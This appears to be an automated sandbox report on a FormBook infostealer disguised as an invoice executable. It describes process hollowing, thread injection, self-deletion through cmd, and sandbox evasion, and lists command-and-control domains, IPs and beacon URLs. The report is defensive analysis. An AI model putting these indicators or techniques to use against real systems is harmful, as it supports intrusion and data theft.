          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04954BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_049F5BA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_049A53CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_049A53CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_049637F5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_049503E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_049503E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_049503E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_049503E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_049503E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_049503E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_0494DBE9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_0494F716 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_049E131B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_049BFF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_049BFF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_049F070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_049F070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_0495A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_0495A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_0495E730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04924F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04924F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_049F8B58 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_0492F358 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_0492DB40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_0493EF40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04953B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04953B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_0492DB60 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_0493FF60 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_049F8F6A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\commercial invoice_010202201.exeProcess queried: DebugPort
          Source: C:\Windows\SysWOW64\colorcpl.exeProcess queried: DebugPort
          Source: C:\Users\user\Desktop\commercial invoice_010202201.exeCode function: 1_2_00409B40 LdrLoadDll,

          HIPS / PFW / Operating System Protection Evasion:

          barindex
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeDomain query: www.sfcshavedice.com
          Source: C:\Windows\explorer.exeDomain query: www.survival-hunter.com
          Source: C:\Windows\explorer.exeDomain query: www.ludowinners.online
          Source: C:\Windows\explorer.exeDomain query: www.moldluck.com
          Source: C:\Windows\explorer.exeNetwork Connect: 118.67.131.217 80
          Source: C:\Windows\explorer.exeNetwork Connect: 23.227.38.74 80
          Source: C:\Windows\explorer.exeNetwork Connect: 199.59.243.200 80
          Source: C:\Windows\explorer.exeNetwork Connect: 109.106.254.15 80
          Source: C:\Windows\explorer.exeDomain query: www.answertitles.com
          Source: C:\Windows\explorer.exeDomain query: www.stardomfrokch.xyz
          Source: C:\Windows\explorer.exeDomain query: www.toposales.com
          Source: C:\Windows\explorer.exeDomain query: www.friendschance.com
          Source: C:\Windows\explorer.exeDomain query: www.cloudtotaal.com
          Source: C:\Windows\explorer.exeNetwork Connect: 198.54.117.211 80
          Source: C:\Windows\explorer.exeDomain query: www.rxvendorpills.online
          Source: C:\Windows\explorer.exeDomain query: www.controle-fiscal.com
          Source: C:\Windows\explorer.exeNetwork Connect: 2.57.90.16 80
          Source: C:\Windows\explorer.exeNetwork Connect: 89.17.204.228 80
          Sample uses process hollowing techniqueShow sources
          Source: C:\Users\user\Desktop\commercial invoice_010202201.exeSection unmapped: C:\Windows\SysWOW64\colorcpl.exe base address: 1330000
          Maps a DLL or memory area into another processShow sources
          Source: C:\Users\user\Desktop\commercial invoice_010202201.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\commercial invoice_010202201.exeSection loaded: unknown target: C:\Windows\SysWOW64\colorcpl.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\commercial invoice_010202201.exeSection loaded: unknown target: C:\Windows\SysWOW64\colorcpl.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Injects a PE file into a foreign processesShow sources
          Source: C:\Users\user\Desktop\commercial invoice_010202201.exeMemory written: C:\Users\user\Desktop\commercial invoice_010202201.exe base: 400000 value starts with: 4D5A
          Queues an APC in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\commercial invoice_010202201.exeThread APC queued: target process: C:\Windows\explorer.exe
          Modifies the context of a thread in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\commercial invoice_010202201.exeThread register set: target process: 3424
          Source: C:\Windows\SysWOW64\colorcpl.exeThread register set: target process: 3424
          Source: C:\Users\user\Desktop\commercial invoice_010202201.exeProcess created: C:\Users\user\Desktop\commercial invoice_010202201.exe "C:\Users\user\Desktop\commercial invoice_010202201.exe"
          Source: C:\Windows\SysWOW64\colorcpl.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\commercial invoice_010202201.exe"
          Source: explorer.exe, 00000005.00000000.687053553.0000000000AD8000.00000004.00000020.sdmp, explorer.exe, 00000005.00000000.700237184.0000000000AD8000.00000004.00000020.sdmp, explorer.exe, 00000005.00000000.715764560.0000000000AD8000.00000004.00000020.sdmpBinary or memory string: ProgmanMD6
          Source: explorer.exe, 00000005.00000000.700556991.0000000001080000.00000002.00020000.sdmp, explorer.exe, 00000005.00000000.687374189.0000000001080000.00000002.00020000.sdmp, explorer.exe, 00000005.00000000.716003606.0000000001080000.00000002.00020000.sdmp, colorcpl.exe, 00000007.00000002.943890329.0000000003350000.00000002.00020000.sdmpBinary or memory string: Program Manager
          Source: explorer.exe, 00000005.00000000.700556991.0000000001080000.00000002.00020000.sdmp, explorer.exe, 00000005.00000000.690157575.0000000005E50000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.687374189.0000000001080000.00000002.00020000.sdmp, explorer.exe, 00000005.00000000.716003606.0000000001080000.00000002.00020000.sdmp, colorcpl.exe, 00000007.00000002.943890329.0000000003350000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000005.00000000.700556991.0000000001080000.00000002.00020000.sdmp, explorer.exe, 00000005.00000000.687374189.0000000001080000.00000002.00020000.sdmp, explorer.exe, 00000005.00000000.716003606.0000000001080000.00000002.00020000.sdmp, colorcpl.exe, 00000007.00000002.943890329.0000000003350000.00000002.00020000.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000005.00000000.700556991.0000000001080000.00000002.00020000.sdmp, explorer.exe, 00000005.00000000.687374189.0000000001080000.00000002.00020000.sdmp, explorer.exe, 00000005.00000000.716003606.0000000001080000.00000002.00020000.sdmp, colorcpl.exe, 00000007.00000002.943890329.0000000003350000.00000002.00020000.sdmpBinary or memory string: Progmanlock
          Source: explorer.exe, 00000005.00000000.722493290.000000000A716000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.705576188.000000000A716000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.693537022.000000000A716000.00000004.00000001.sdmpBinary or memory string: Shell_TrayWnd5D
          Source: C:\Users\user\Desktop\commercial invoice_010202201.exeCode function: 0_2_00405AA7 GetVersion,GetSystemDirectoryA,GetWindowsDirectoryA,SHGetSpecialFolderLocation,SHGetPathFromIDListA,CoTaskMemFree,lstrcatA,lstrlenA,

          Stealing of Sensitive Information:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 0.2.commercial invoice_010202201.exe.24d0000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.commercial invoice_010202201.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.commercial invoice_010202201.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.commercial invoice_010202201.exe.400000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.commercial invoice_010202201.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.commercial invoice_010202201.exe.24d0000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.commercial invoice_010202201.exe.400000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.commercial invoice_010202201.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.commercial invoice_010202201.exe.400000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.commercial invoice_010202201.exe.400000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.commercial invoice_010202201.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000005.00000000.724210949.000000000EA3D000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.943178813.0000000000840000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.943350067.0000000000DF0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.734155296.0000000000910000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000000.683264295.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.943426858.0000000001150000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.708365892.000000000EA3D000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.734132001.00000000008E0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.684515083.00000000024D0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000001.684056939.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000000.681309945.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.734016685.0000000000400000.00000040.00000001.sdmp, type: MEMORY

          Remote Access Functionality:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 0.2.commercial invoice_010202201.exe.24d0000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.commercial invoice_010202201.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.commercial invoice_010202201.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.commercial invoice_010202201.exe.400000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.commercial invoice_010202201.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.commercial invoice_010202201.exe.24d0000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.commercial invoice_010202201.exe.400000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.commercial invoice_010202201.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.commercial invoice_010202201.exe.400000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.commercial invoice_010202201.exe.400000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.commercial invoice_010202201.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000005.00000000.724210949.000000000EA3D000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.943178813.0000000000840000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.943350067.0000000000DF0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.734155296.0000000000910000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000000.683264295.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.943426858.0000000001150000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.708365892.000000000EA3D000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.734132001.00000000008E0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.684515083.00000000024D0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000001.684056939.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000000.681309945.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.734016685.0000000000400000.00000040.00000001.sdmp, type: MEMORY

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid AccountsNative API1Path InterceptionProcess Injection612Virtualization/Sandbox Evasion2OS Credential DumpingSecurity Software Discovery221Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationSystem Shutdown/Reboot1
          Default AccountsShared Modules1Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsProcess Injection612LSASS MemoryVirtualization/Sandbox Evasion2Remote Desktop ProtocolClipboard Data1Exfiltration Over BluetoothIngress Tool Transfer3Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Deobfuscate/Decode Files or Information1Security Account ManagerProcess Discovery2SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Obfuscated Files or Information2NTDSRemote System Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol13SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptSoftware Packing1LSA SecretsFile and Directory Discovery2SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.commonFile Deletion1Cached Domain CredentialsSystem Information Discovery13VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 553094 Sample: commercial invoice_010202201.exe Startdate: 14/01/2022 Architecture: WINDOWS Score: 100 31 www.laraful.com 2->31 33 laraful.com 2->33 41 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->41 43 Found malware configuration 2->43 45 Malicious sample detected (through community Yara rule) 2->45 47 9 other signatures 2->47 11 commercial invoice_010202201.exe 19 2->11         started        signatures3 process4 file5 29 C:\Users\user\AppData\Local\Temp\...\uajs.dll, PE32 11->29 dropped 61 Injects a PE file into a foreign processes 11->61 15 commercial invoice_010202201.exe 11->15         started        signatures6 process7 signatures8 63 Modifies the context of a thread in another process (thread injection) 15->63 65 Maps a DLL or memory area into another process 15->65 67 Sample uses process hollowing technique 15->67 69 Queues an APC in another process (thread injection) 15->69 18 explorer.exe 15->18 injected process9 dnsIp10 35 www.stardomfrokch.xyz 18->35 37 ludowinners.online 109.106.254.15, 49815, 80 NETNET-ASRS Serbia 18->37 39 13 other IPs or domains 18->39 49 System process connects to network (likely due to code injection or exploit) 18->49 51 Performs DNS queries to domains with low reputation 18->51 22 colorcpl.exe 18->22         started        signatures11 process12 signatures13 53 Self deletion via cmd delete 22->53 55 Modifies the context of a thread in another process (thread injection) 22->55 57 Maps a DLL or memory area into another process 22->57 59 Tries to detect virtualization through RDTSC time measurements 22->59 25 cmd.exe 1 22->25         started        process14 process15 27 conhost.exe 25->27         started       

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.

          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          commercial invoice_010202201.exe37%ReversingLabsWin32.Trojan.Risis
          commercial invoice_010202201.exe100%Joe Sandbox ML

          Dropped Files

          SourceDetectionScannerLabelLink
          C:\Users\user\AppData\Local\Temp\nshDF13.tmp\uajs.dll16%ReversingLabsWin32.Trojan.Jaik

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          0.2.commercial invoice_010202201.exe.24d0000.3.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          7.2.colorcpl.exe.b83930.0.unpack100%AviraTR/Patched.Ren.GenDownload File
          1.0.commercial invoice_010202201.exe.400000.0.unpack100%AviraTR/Patched.Ren.Gen2Download File
          1.0.commercial invoice_010202201.exe.400000.3.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          1.1.commercial invoice_010202201.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          1.0.commercial invoice_010202201.exe.400000.2.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          1.0.commercial invoice_010202201.exe.400000.1.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          1.2.commercial invoice_010202201.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          7.2.colorcpl.exe.4e3796c.4.unpack100%AviraTR/Patched.Ren.GenDownload File

          Domains

          No Antivirus matches

          URLs

          SourceDetectionScannerLabelLink
          http://www.sfcshavedice.com/igwa/?JXRL2Htp=iLZ1RFWiw0U4S9E0pDZlJcjoptUhYXlNWk90HzYHcuVmRCYph1Gowzt+bYvcpjSVMV+b&2dyD8R=k0GL0%Avira URL Cloudsafe
          http://www.toposales.com/igwa/?JXRL2Htp=ma6dGeieA/uMuLPHhGmEMO0MhvgJCSwWTtOunmNNbuA50fkYJarGKThxl5bT79VqZFZn&2dyD8R=k0GL100%Avira URL Cloudmalware
          https://www.survival-hunter.com/igwa/?JXRL2Htp=XkWoyKtjfo1nTXOdSlOCxSRnTVDbDlQTsKZVtKCHx1ue89AIkDfi0%Avira URL Cloudsafe
          http://www.friendschance.com/igwa/?JXRL2Htp=kcJK5GFpDKPtevBg1nN4AS2uwE6IDbqQL9Esa69lHd4fhlo3nfdugBZ3P+KHWdbb77iO&2dyD8R=k0GL0%Avira URL Cloudsafe
          http://www.ludowinners.online/igwa/?JXRL2Htp=P7cOGMhGan+iOds35nuUwcQL6AiWu3hpp80V2Eae8ndsAihNyn6owzlv0a79YI8S4Mj0&2dyD8R=k0GL0%Avira URL Cloudsafe
          http://www.survival-hunter.com/igwa/?JXRL2Htp=XkWoyKtjfo1nTXOdSlOCxSRnTVDbDlQTsKZVtKCHx1ue89AIkDfi+mwVckT9NwCZj6NC&2dyD8R=k0GL0%Avira URL Cloudsafe
          http://www.stardomfrokch.xyz/igwa/?JXRL2Htp=fxfNgp9ZS8bh2/dcez9r/a5fPpTZli2HVK4HIQKX3jCJ31NosuhFm2CAaUmyjrkPXZG7&2dyD8R=k0GL100%Avira URL Cloudmalware
          www.toposales.com/igwa/100%Avira URL Cloudmalware
          http://www.answertitles.com/igwa/?JXRL2Htp=zipQeNKESZPqCbLQlDCLj4zpqFgOpmaVmA6du1Oyf7pRL9Y+oEdiiyDWqjEEpcoXahJo&2dyD8R=k0GL100%Avira URL Cloudmalware
          http://www.rxvendorpills.online/igwa/?JXRL2Htp=pt5DjHHXKdbYY+ulYudT7OdutHPMSBHvoYqZ/+0K/RDZ4aBmJwtpu5HKuc6CLarugF7n&2dyD8R=k0GL100%Avira URL Cloudmalware

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          www.friendschance.com
          118.67.131.217
          truetrue
            unknown
            www.sfcshavedice.com
            199.59.243.200
            truetrue
              unknown
              www.survival-hunter.com
              89.17.204.228
              truetrue
                unknown
                parkingpage.namecheap.com
                198.54.117.211
                truefalse
                  high
                  laraful.com
                  34.102.136.180
                  truetrue
                    unknown
                    shops.myshopify.com
                    23.227.38.74
                    truetrue
                      unknown
                      rxvendorpills.online
                      2.57.90.16
                      truetrue
                        unknown
                        ludowinners.online
                        109.106.254.15
                        truetrue
                          unknown
                          www.toposales.com
                          unknown
                          unknowntrue
                            unknown
                            www.ludowinners.online
                            unknown
                            unknowntrue
                              unknown
                              www.cloudtotaal.com
                              unknown
                              unknowntrue
                                unknown
                                www.moldluck.com
                                unknown
                                unknowntrue
                                  unknown
                                  www.laraful.com
                                  unknown
                                  unknowntrue
                                    unknown
                                    www.rxvendorpills.online
                                    unknown
                                    unknowntrue
                                      unknown
                                      www.controle-fiscal.com
                                      unknown
                                      unknowntrue
                                        unknown
                                        www.answertitles.com
                                        unknown
                                        unknowntrue
                                          unknown
                                          www.stardomfrokch.xyz
                                          unknown
                                          unknowntrue
                                            unknown

                                            Contacted URLs

                                            NameMaliciousAntivirus DetectionReputation
                                            http://www.sfcshavedice.com/igwa/?JXRL2Htp=iLZ1RFWiw0U4S9E0pDZlJcjoptUhYXlNWk90HzYHcuVmRCYph1Gowzt+bYvcpjSVMV+b&2dyD8R=k0GLtrue
                                            • Avira URL Cloud: safe
                                            unknown
                                            http://www.toposales.com/igwa/?JXRL2Htp=ma6dGeieA/uMuLPHhGmEMO0MhvgJCSwWTtOunmNNbuA50fkYJarGKThxl5bT79VqZFZn&2dyD8R=k0GLtrue
                                            • Avira URL Cloud: malware
                                            unknown
                                            http://www.friendschance.com/igwa/?JXRL2Htp=kcJK5GFpDKPtevBg1nN4AS2uwE6IDbqQL9Esa69lHd4fhlo3nfdugBZ3P+KHWdbb77iO&2dyD8R=k0GLtrue
                                            • Avira URL Cloud: safe
                                            unknown
                                            http://www.ludowinners.online/igwa/?JXRL2Htp=P7cOGMhGan+iOds35nuUwcQL6AiWu3hpp80V2Eae8ndsAihNyn6owzlv0a79YI8S4Mj0&2dyD8R=k0GLtrue
                                            • Avira URL Cloud: safe
                                            unknown
                                            http://www.survival-hunter.com/igwa/?JXRL2Htp=XkWoyKtjfo1nTXOdSlOCxSRnTVDbDlQTsKZVtKCHx1ue89AIkDfi+mwVckT9NwCZj6NC&2dyD8R=k0GLtrue
                                            • Avira URL Cloud: safe
                                            unknown
                                            http://www.stardomfrokch.xyz/igwa/?JXRL2Htp=fxfNgp9ZS8bh2/dcez9r/a5fPpTZli2HVK4HIQKX3jCJ31NosuhFm2CAaUmyjrkPXZG7&2dyD8R=k0GLtrue
                                            • Avira URL Cloud: malware
                                            unknown
                                            www.toposales.com/igwa/true
                                            • Avira URL Cloud: malware
                                            low
                                            http://www.answertitles.com/igwa/?JXRL2Htp=zipQeNKESZPqCbLQlDCLj4zpqFgOpmaVmA6du1Oyf7pRL9Y+oEdiiyDWqjEEpcoXahJo&2dyD8R=k0GLtrue
                                            • Avira URL Cloud: malware
                                            unknown
                                            http://www.rxvendorpills.online/igwa/?JXRL2Htp=pt5DjHHXKdbYY+ulYudT7OdutHPMSBHvoYqZ/+0K/RDZ4aBmJwtpu5HKuc6CLarugF7n&2dyD8R=k0GLtrue
                                            • Avira URL Cloud: malware
                                            unknown

                                            URLs from Memory and Binaries

                                            NameSourceMaliciousAntivirus DetectionReputation
                                            https://www.survival-hunter.com/igwa/?JXRL2Htp=XkWoyKtjfo1nTXOdSlOCxSRnTVDbDlQTsKZVtKCHx1ue89AIkDficolorcpl.exe, 00000007.00000002.944462814.0000000004FB2000.00000004.00020000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            http://nsis.sf.net/NSIS_Errorcommercial invoice_010202201.exefalse
                                              high
                                              http://nsis.sf.net/NSIS_ErrorErrorcommercial invoice_010202201.exefalse
                                                high

                                                Contacted IPs

                                                • No. of IPs < 25%
                                                • 25% < No. of IPs < 50%
                                                • 50% < No. of IPs < 75%
                                                • 75% < No. of IPs

                                                Public

                                                IPDomainCountryFlagASNASN NameMalicious
                                                118.67.131.217
                                                www.friendschance.comKorea Republic of
                                                24395CLEAR-AS-APClearNetworksPtyLtdAUtrue
                                                23.227.38.74
                                                shops.myshopify.comCanada
                                                13335CLOUDFLARENETUStrue
                                                198.54.117.211
                                                parkingpage.namecheap.comUnited States
                                                22612NAMECHEAP-NETUSfalse
                                                199.59.243.200
                                                www.sfcshavedice.comUnited States
                                                395082BODIS-NJUStrue
                                                2.57.90.16
                                                rxvendorpills.onlineLithuania
                                                47583AS-HOSTINGERLTtrue
                                                109.106.254.15
                                                ludowinners.onlineSerbia
                                                199493NETNET-ASRStrue
                                                89.17.204.228
                                                www.survival-hunter.comSpain
                                                16371ACENS_ASSpainHostinghousingandVPNservicesEStrue

                                                General Information

                                                Joe Sandbox Version:34.0.0 Boulder Opal
                                                Analysis ID:553094
                                                Start date:14.01.2022
                                                Start time:10:19:33
                                                Joe Sandbox Product:CloudBasic
                                                Overall analysis duration:0h 10m 12s
                                                Hypervisor based Inspection enabled:false
                                                Report type:light
                                                Sample file name:commercial invoice_010202201.exe
                                                Cookbook file name:default.jbs
                                                Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                Number of analysed new started processes analysed:18
                                                Number of new started drivers analysed:0
                                                Number of existing processes analysed:0
                                                Number of existing drivers analysed:0
                                                Number of injected processes analysed:1
                                                Technologies:
                                                • HCA enabled
                                                • EGA enabled
                                                • HDC enabled
                                                • AMSI enabled
                                                Analysis Mode:default
                                                Analysis stop reason:Timeout
                                                Detection:MAL
                                                Classification:mal100.troj.evad.winEXE@7/4@14/7
                                                EGA Information:
                                                • Successful, ratio: 100%
                                                HDC Information:
                                                • Successful, ratio: 56.9% (good quality ratio 51.8%)
                                                • Quality average: 72.5%
                                                • Quality standard deviation: 31.8%
                                                HCA Information:
                                                • Successful, ratio: 86%
                                                • Number of executed functions: 0
                                                • Number of non-executed functions: 0
                                                Cookbook Comments:
                                                • Adjust boot time
                                                • Enable AMSI
                                                • Found application associated with file extension: .exe
                                                Warnings:
                                                Show All
                                                • Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, backgroundTaskHost.exe, svchost.exe, wuapihost.exe
                                                • Excluded IPs from analysis (whitelisted): 23.211.6.115, 204.79.197.222
                                                • Excluded domains from analysis (whitelisted): ris.api.iris.microsoft.com, fp.msedge.net, a-0019.a-msedge.net, e12564.dspb.akamaiedge.net, store-images.s-microsoft.com, a-0019.standard.a-msedge.net, store-images.s-microsoft.com-c.edgekey.net, 1.perf.msedge.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com
                                                • Not all processes where analyzed, report is missing behavior information

                                                Simulations

                                                Behavior and APIs

                                                No simulations

                                                Joe Sandbox View / Context

                                                IPs

                                                No context

                                                Domains

                                                No context

                                                ASN

                                                No context

                                                JA3 Fingerprints

                                                No context

                                                Dropped Files

                                                No context

                                                Created / dropped Files

                                                C:\Users\user\AppData\Local\Temp\5kowm48kjaiw3ht
                                                Process:C:\Users\user\Desktop\commercial invoice_010202201.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):215764
                                                Entropy (8bit):7.9934710763964425
                                                Encrypted:true
                                                SSDEEP:6144:EGYAQ1nFCsyFJLgoA7MfkcSCTmhZF7Tr1OvXxj:RvQ1nFCvnwgccSCKhr7PMfp
                                                MD5:A1416D83EED4E11BA25BBE6EC456D053
                                                SHA1:467523CD8AA55AC5F208D8B68CD8E660DBBE8C27
